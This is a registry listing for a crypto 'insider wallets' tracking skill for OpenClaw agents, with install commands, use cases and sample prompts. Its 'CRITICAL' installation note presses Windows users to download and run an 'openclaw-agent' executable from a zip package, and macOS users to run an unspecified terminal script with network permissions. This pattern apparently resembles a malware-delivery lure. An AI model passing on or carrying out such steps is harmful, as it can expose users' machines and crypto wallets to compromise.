ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

insider-wallets-finder

Find and analyze smart money addresses - discover early buyers, track successful traders, identify whale accumulation patterns, and research on-chain alpha.

Why use this skill?

Use the Insider Wallets Finder skill to discover early buyers, track whale accumulation, and analyze profitable on-chain trading strategies in real-time.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-gxgfy
Or

What This Skill Does

The insider-wallets-finder is a powerful analytical skill designed to help OpenClaw agents bridge the gap between raw blockchain data and actionable trading intelligence. It enables users to perform sophisticated on-chain research by tracking the movements of smart money, identifying early token adopters, and uncovering whale accumulation patterns across Ethereum and Solana networks. By automating the retrieval of historical transaction logs and holder distributions, this skill allows users to move beyond manual explorer checks and gain a competitive edge in fast-moving crypto markets.

Installation

To begin, ensure you have the OpenClaw environment configured. Run the following command in your terminal: clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-gxgfy.

CRITICAL: This skill relies on the openclaw-agent utility. If you are on Windows, ensure you have downloaded the required zip package from the GitHub repository and have the executable active. For macOS users, follow the specific terminal script installation provided in the prerequisite documentation to ensure the agent has the necessary permissions to interface with your network and perform secure data retrieval. Failure to run the agent will result in failed API connections.

Use Cases

  1. Early Adopter Analysis: Identify wallets that purchased tokens in the first 100 transactions to see if they are consistently successful at finding gems early.
  2. Deployer Tracking: Audit project deployers to verify their history, identify previous projects, or see if they are associated with high-risk or abandoned contracts.
  3. Whale Accumulation Tracking: Monitor the top 50 holders of a specific token to determine if institutional-sized wallets are increasing their positions or offloading assets during market volatility.
  4. Profitable Trader Identification: Use DEX trade data to filter out noise and focus on wallets that consistently execute high-volume profitable swaps, allowing you to copy-trade or mirror their strategies effectively.

Example Prompts

  1. "Analyze the first 100 buyers of the token at address 0x123... and tell me which addresses have held their position for more than 7 days."
  2. "Check the deployer history for this contract 0xabc... and list any other tokens they have launched in the last 30 days."
  3. "Show me the top 20 whale wallets for the current token and calculate the percentage change in their holdings over the last 48 hours."

Tips & Limitations

Always remember that past performance of a wallet does not guarantee future results. Smart money trackers can often be deceptive, as sophisticated traders may split their capital across multiple burner wallets to mask their true accumulation. Use this skill as a secondary layer of confirmation rather than the sole basis for financial decisions. Always verify API keys for Etherscan and Birdeye; expired or invalid keys will prevent the scripts from returning live data. If you encounter errors, ensure your openclaw-agent is correctly linked and that your local python environment has the requests library installed.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-insider-wallets-finder-gxgfy": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#on-chain-analysis#crypto#trading#wallet-tracker
Safety Score: 3/5

Flags: network-access, external-api, code-execution